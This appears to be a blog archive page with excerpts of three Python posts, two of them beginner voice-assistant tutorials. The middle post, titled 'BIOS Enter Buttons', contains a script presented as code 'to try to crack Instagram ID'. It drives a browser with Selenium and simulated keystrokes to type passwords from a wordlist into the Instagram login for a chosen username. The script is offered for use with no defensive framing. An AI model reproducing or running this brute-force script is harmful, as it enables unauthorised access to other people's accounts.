Posts

Showing posts from July, 2021

How to make Voice Assistant || Computer or Laptop Assistant || by Piyush Baghel

Image
Make your own Voice Assistant Code of Voice Assistant   Namaste Python Users,     Here we learn about how to make Voice Assistant at Home by using python code     In this Assistant,  you can change  commands   as your demand.     In the file, you get day wishes ("Good morning", "Good Evening", or "Good night") and callable functions like ("play music", "open Google", etc.) also can send mails by your account. Just speak send mail to "receiver".      And much more you can add to this file. Before using it Please install Python's latest version. then, save these codes as save as (. py ) is meant to save as. ❤❤❤👀👀 import   pyttsx3        #pip install pyttsx3 import   webbrowser     #pip install webbrowser import   datetime import   wikipedia      #pip install wikipedia import   os import   smtplib ...

BIOS Enter Buttons

Image
  code to try to crack Instagram ID from webbot import Browser from selenium import webdriver from pynput . keyboard import Key , Controller import time usern = input ( "Enter Your User Na" ) bruteforce = open ( 'psswd.txt' , 'r' ) web = webdriver . Chrome ( "C: \\ Users \\ piyush__18__ \\ Downloads\Compressed \\ chromedriver_win32 \\ chromedriver" ) kboard = Controller () # webb = Browser() web . get ( "https://www.instagram.com" ) time . sleep ( 5 ) kboard .press( Key .f6) kboard .release( Key .f6) time . sleep ( 5 ) kboard .press( Key .enter) kboard .release( Key .enter) time . sleep ( 5 ) kboard .press( Key .tab) kboard .release( Key .tab) time . sleep ( 5 ) kboard .type( usern ) kboard .press( Key .tab) kboard .release( Key .tab) time . sleep ( 5 ) for brute in bruteforce :     kboard .type( brute )     kboard .press( Key .enter)     kboard .release( Key .enter)     time . sleep ( 0.5 )     with kboard .presse...

Alexa with Python

Image
Make your own Alexa with Python | Python Beginner Some Basic Python Command to make AI-type Assistant... import   speech_recognition   as   sr import   pyttsx3 import   pywhatkit import   datetime import   wikipedia import   pyjokes listener  =  sr . Recognizer () engine  =  pyttsx3 . init () voices  =  engine . getProperty ( 'voices' ) engine . setProperty ( 'voice' ,  voices [ 1 ].id) def   talk ( text ):      engine . say ( text )      engine . runAndWait () def   take_command ():               with   sr . Microphone ()  as   source :              print ( 'listening...' )              voice  =  listener . listen ( source )       ...